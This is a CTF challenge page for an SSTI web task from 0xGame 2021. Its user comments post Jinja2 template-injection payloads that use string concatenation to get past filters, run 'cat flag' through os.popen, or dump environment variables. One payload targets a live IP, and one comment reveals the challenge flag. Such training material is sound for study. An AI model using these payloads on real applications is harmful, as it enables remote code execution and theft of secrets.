sstiWEB 未解决

分数: 0 金币: 0
所属赛事: 0xGame 2021
题目作者: 未知
一  血: Lamb
一血奖励: 0金币
解  决: 182
提  示:
描  述:
0xGame{}
评论
zrlht 1月前

search={{lipsum['_'+'_globals_'+'_']['os'].popen('cat+/flag').read()}}

回复 0

zrlht 1月前

search={{''['_'+'_c'+'lass_'+'_']['_'+'_base_'+'_']['_'+'_subcl'+'asses_'+'_']()[127]['_'+'_in'+'it_'+'_']['_'+'_globals_'+'_']['environ']}}

回复 0

r1ng_13 6月前

找到注入点,分镜直接秒

回复 0

nakanodarling 1年前

fenjing

回复 0

yaozhiwang 1年前

0xGame{fl4sk_sst1_ju5t_5o_s0,r1ght?}

回复 0

xiaobai568 2年前

wp可参考https://ctf.bugku.com/writeup/detail/id/1203.html

回复 0

WCRH 2年前

首先无脑尝试几个语句,很容易发现__被过滤,那就字符串拼接(其实还有class被过滤,这个比较难发现,只能一个个尝试)

回复 0

单手压FL 2年前

search={{url_for['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}

回复 0

jz1111 2年前

http://82.157.146.43:18893/?search={{config['_'+'_'+'c'+'l'+'a'+'s'+'s'+'_'+'_']['_'+'_'+'init'+'_'+'_']['_'+'_'+'globals'+'_'+'_']['os'].popen('cat flag').read()}}

回复 1

2728462336 2年前

爆出传参search,利用字符串拼接绕过

回复 0

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

wengun 攻破了该题 4天前
GrantFly 攻破了该题 7天前
爱吃馒头 攻破了该题 12天前
灵梦归希 攻破了该题 19天前
ccttff123 攻破了该题 26天前
hdcc1 攻破了该题 26天前
xiaodou 攻破了该题 28天前
dddddddwww 攻破了该题 29天前
i8vkmmju 攻破了该题 1月前
jibabenba 攻破了该题 1月前
879205607 攻破了该题 1月前
caixinggang 攻破了该题 1月前
zrlht 攻破了该题 1月前
路人甲1123 攻破了该题 1月前
vx606v 攻破了该题 1月前
孙笑川ᒿ58 攻破了该题 1月前
百里一兔 攻破了该题 2月前
rschei7 攻破了该题 2月前
18096199839 攻破了该题 2月前
WJaosn 攻破了该题 3月前
问题反馈